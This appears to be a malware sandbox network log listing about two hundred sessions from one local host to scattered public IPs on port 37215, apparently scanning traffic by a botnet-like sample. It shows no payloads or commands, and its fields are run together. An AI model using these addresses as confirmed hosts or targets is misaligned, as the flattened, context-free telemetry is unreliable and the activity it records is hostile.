                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17106192.168.2.1341796219.196.72.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17107192.168.2.1336108221.155.68.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17108192.168.2.1335740157.172.204.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17109192.168.2.1343438197.204.106.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17110192.168.2.136087441.89.84.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17111192.168.2.1340480197.246.236.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17112192.168.2.134763041.3.115.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17113192.168.2.135261241.212.200.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17114192.168.2.133967841.225.238.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17115192.168.2.1336940157.91.121.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17116192.168.2.1335962197.251.61.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17117192.168.2.134499861.84.234.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17118192.168.2.135763441.100.229.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17119192.168.2.1352946197.181.92.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17120192.168.2.133989441.171.134.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17121192.168.2.135293841.175.127.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17122192.168.2.133279241.234.92.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17123192.168.2.1356398157.114.41.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17124192.168.2.1336502197.232.8.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17125192.168.2.1352784197.232.144.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17126192.168.2.134353241.137.3.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17127192.168.2.133477441.74.102.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17128192.168.2.1360328197.116.249.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17129192.168.2.134875241.178.105.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17130192.168.2.134788836.144.64.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17131192.168.2.135651841.148.32.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17132192.168.2.1351556197.172.252.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17133192.168.2.134906041.9.183.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17134192.168.2.1356788147.171.42.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17135192.168.2.134404252.99.216.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17136192.168.2.1338946136.89.134.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17137192.168.2.1353028157.147.11.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17138192.168.2.135567278.248.200.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17139192.168.2.1353132197.249.43.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17140192.168.2.1348598197.64.72.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17141192.168.2.1340188216.64.207.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17142192.168.2.1359470157.122.25.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17143192.168.2.1336004126.87.170.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17144192.168.2.1360030197.115.146.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17145192.168.2.1360722199.186.66.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17146192.168.2.1345540197.103.205.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17147192.168.2.1347276197.55.243.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17148192.168.2.1342936141.221.69.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17149192.168.2.1360870157.44.181.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17150192.168.2.135015641.170.147.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17151192.168.2.133457465.149.183.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17152192.168.2.1352282203.193.38.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17153192.168.2.135283241.225.159.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17154192.168.2.1340310157.8.57.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17155192.168.2.1347450197.157.218.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17156192.168.2.134731279.15.203.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17157192.168.2.134327241.133.174.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17158192.168.2.1359240157.225.13.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17159192.168.2.1337054197.193.40.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17160192.168.2.1354954157.222.222.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17161192.168.2.1360512193.90.29.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17162192.168.2.1340018197.229.122.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17163192.168.2.1347108197.172.215.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17164192.168.2.134250241.74.147.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17165192.168.2.135271441.137.148.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17166192.168.2.1345304117.209.183.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17167192.168.2.1360926126.151.79.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17168192.168.2.135337641.211.111.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17169192.168.2.1355600197.26.210.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17170192.168.2.134927487.114.130.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17171192.168.2.135285441.83.184.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17172192.168.2.1347924197.56.46.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17173192.168.2.1337426197.90.173.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17174192.168.2.136073041.193.50.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17175192.168.2.1342242157.245.144.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17176192.168.2.1349686157.254.61.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17177192.168.2.135024241.127.81.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17178192.168.2.134477241.1.70.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17179192.168.2.1353460197.95.254.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17180192.168.2.1351754102.67.127.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17181192.168.2.133841249.5.134.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17182192.168.2.1353630157.74.137.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17183192.168.2.134024441.62.235.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17184192.168.2.134924441.34.111.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17185192.168.2.1339692197.52.172.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17186192.168.2.1335862157.71.16.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17187192.168.2.134228441.210.10.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17188192.168.2.1334112157.199.40.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17189192.168.2.1341726157.98.119.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17190192.168.2.1358588157.128.215.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17191192.168.2.1347362157.37.195.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192192.168.2.135057641.140.155.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17193192.168.2.1357180143.27.43.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17194192.168.2.1337264157.32.101.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17195192.168.2.1335142197.200.109.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17196192.168.2.1343518197.79.205.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17197192.168.2.1354566157.193.172.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17198192.168.2.133564241.162.55.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17199192.168.2.134343041.221.170.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17200192.168.2.134952038.155.165.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17201192.168.2.135159085.233.156.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17202192.168.2.134386076.47.120.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17203192.168.2.1333598157.149.104.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17204192.168.2.1347258197.128.241.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17205192.168.2.1336030197.24.102.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17206192.168.2.134086641.68.184.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17207192.168.2.1345302160.184.113.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17208192.168.2.1352452157.17.167.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17209192.168.2.1335686191.237.168.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17210192.168.2.1333676197.126.98.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17211192.168.2.1347196197.88.135.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17212192.168.2.1335332157.77.173.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17213192.168.2.135381241.212.134.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17214192.168.2.1360506148.246.206.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17215192.168.2.134323031.87.178.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17216192.168.2.1350454157.151.138.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17217192.168.2.1342160197.232.217.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17218192.168.2.1356540157.186.159.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17219192.168.2.1355068197.45.237.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17220192.168.2.135979241.230.173.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17221192.168.2.1346392197.109.8.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17222192.168.2.1342620197.236.15.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17223192.168.2.134619241.9.116.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17224192.168.2.1334796197.30.115.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17225192.168.2.1354790210.96.11.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17226192.168.2.1336202102.235.188.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17227192.168.2.13478001.166.63.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17228192.168.2.134971213.198.46.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17229192.168.2.1345708197.27.147.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17230192.168.2.134989641.72.139.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17231192.168.2.1348610150.156.110.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17232192.168.2.1351586165.224.97.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17233192.168.2.1338334157.231.235.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17234192.168.2.1360328157.255.57.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17235192.168.2.1343084157.254.52.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17236192.168.2.1349578197.228.231.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17237192.168.2.134348841.52.71.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17238192.168.2.1355890197.12.27.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17239192.168.2.1338378178.5.158.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17240192.168.2.13509668.59.198.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17241192.168.2.1344998197.184.129.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17242192.168.2.135596268.153.46.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17243192.168.2.135186241.130.178.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17244192.168.2.135062841.178.216.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17245192.168.2.1333288104.115.23.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17246192.168.2.134836041.221.90.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17247192.168.2.135998241.156.171.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17248192.168.2.1339154142.237.94.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17249192.168.2.1333320197.197.204.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17250192.168.2.134092041.249.22.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17251192.168.2.1340620197.32.154.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17252192.168.2.1356228189.88.130.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17253192.168.2.1333702157.197.145.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17254192.168.2.135262667.91.209.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17255192.168.2.1357912208.142.218.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17256192.168.2.133879041.80.173.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17257192.168.2.135041641.143.118.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17258192.168.2.1335598197.36.135.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17259192.168.2.134213841.248.242.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17260192.168.2.1355388197.212.33.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17261192.168.2.135158841.172.59.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17262192.168.2.1334510197.184.204.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17263192.168.2.1335966157.210.111.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17264192.168.2.135401641.156.99.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17265192.168.2.1343214197.189.178.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17266192.168.2.1348792197.213.24.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17267192.168.2.133844641.48.182.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17268192.168.2.134979441.77.169.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17269192.168.2.1358736197.203.212.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17270192.168.2.1360160197.77.66.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17271192.168.2.1338548197.22.198.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17272192.168.2.1355452157.249.164.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17273192.168.2.135638441.157.216.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17274192.168.2.135820441.58.255.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17275192.168.2.1342432157.27.137.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17276192.168.2.1345040197.222.212.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17277192.168.2.134390441.92.33.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17278192.168.2.1357992157.18.252.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17279192.168.2.1352020197.57.156.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17280192.168.2.134358641.152.209.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17281192.168.2.134303041.250.101.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17282192.168.2.133423041.41.53.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17283192.168.2.1339894157.141.126.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17284192.168.2.1346896197.236.14.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17285192.168.2.133473441.70.69.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17286192.168.2.135599041.109.215.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17287192.168.2.135101219.72.181.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17288192.168.2.1350342157.70.204.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17289192.168.2.1341698197.152.31.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17290192.168.2.1340486197.238.30.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17291192.168.2.1360448157.207.214.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17292192.168.2.1342962197.176.36.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17293192.168.2.1359958197.173.222.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17294192.168.2.1336104157.52.144.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17295192.168.2.135974617.61.194.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17296192.168.2.1340156110.30.55.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17297192.168.2.1333904157.214.41.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17298192.168.2.1340788197.194.138.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17299192.168.2.1334142197.113.252.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17300192.168.2.1335784157.46.31.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17301192.168.2.1340246157.229.151.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17302192.168.2.1353042197.249.91.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17303192.168.2.134089041.92.60.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17304192.168.2.1334130157.195.219.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17305192.168.2.1357080157.153.67.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17306192.168.2.1345456161.6.132.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17307192.168.2.1340450157.16.31.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17308192.168.2.1338358197.243.11.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17309192.168.2.133671441.141.145.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17310192.168.2.133307871.144.56.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17311192.168.2.133347441.121.34.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17312192.168.2.135726060.1.127.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17313192.168.2.134953267.16.173.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17314192.168.2.1346686185.194.98.18437215
                                                  TimestampBytes transferredDirectionData


